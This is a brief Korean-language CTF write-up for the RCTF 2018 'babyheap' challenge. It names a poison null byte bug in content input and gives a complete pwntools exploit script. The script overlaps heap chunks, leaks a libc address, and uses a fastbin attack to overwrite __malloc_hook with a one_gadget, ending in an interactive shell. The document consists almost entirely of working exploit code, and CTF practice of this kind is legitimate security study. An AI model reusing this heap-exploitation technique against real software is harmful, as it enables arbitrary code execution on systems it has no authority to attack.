[RCTF 2018] babyheap

content를 입력받을때 poison null byte 취약점이 존재한다. 요놈을 잘 이용해서 청크들을 잘 꼬아서 병합과정에서 문제를 일으키면 된다. poison null byte에 대한 자세한 설명은

https://www.lazenca.net/display/TEC/Poison+null+byte <- 요기로

 

 

from pwn import *
 
s = process("./babyheap")
elf = ELF("./babyheap")
libc = ELF("./libc.so.6")
 
def alloc(size,content):
    s.sendlineafter("choice:","1")
    s.sendlineafter("size:",str(size))
    s.sendlineafter("content: ",content)
 
def show(index):
    s.sendlineafter("choice:","2")
    s.sendlineafter("index:",str(index))
 
def dell(index):
    s.sendlineafter("choice:","3")
    s.sendlineafter("index:",str(index))
 
def quit():
    s.sendlineafter("choice:","4")
 
alloc(0x80,"A"*8) #0
alloc(0x100,p64(0)*29+p64(0x100)) #1
alloc(0x80,"C"*8) #2
 
dell(0)
dell(1)
 
alloc(0x88,"A"*0x88) #0
alloc(0x80,"D"*8) #1
alloc(0x60,"E"*8) #3
 
dell(1)
dell(2)
 
alloc(0x80,"1"*8) #1
alloc(0x80,"2"*8) # 2,3
alloc(0x80,"3"*8) #4
 
dell(3)
 
show(2)
s.recvuntil("tent: ")
leak = u64(s.recv(6)+"\x00\x00")
print "leak : " + hex(leak)
libc_base = leak - 0x3c4b78
malloc_hook = libc_base + libc.symbols['__malloc_hook']
one_shot = libc_base + 0x4526a
print "libc_base : " + hex(libc_base)
print "malloc_hook : " + hex(malloc_hook)
print "one_shot : " + hex(one_shot)
 
alloc(0x60,"4"*8) #2,3
alloc(0x60,"5"*8) #5
 
dell(3)
dell(5)
dell(2)
 
alloc(0x60,p64(malloc_hook - 19))
alloc(0x60,"6")
alloc(0x60,"7")
alloc(0x60,"8"*3+p64(one_shot))
 
s.sendlineafter(":","1")
s.sendlineafter("size:","32")
 
s.interactive()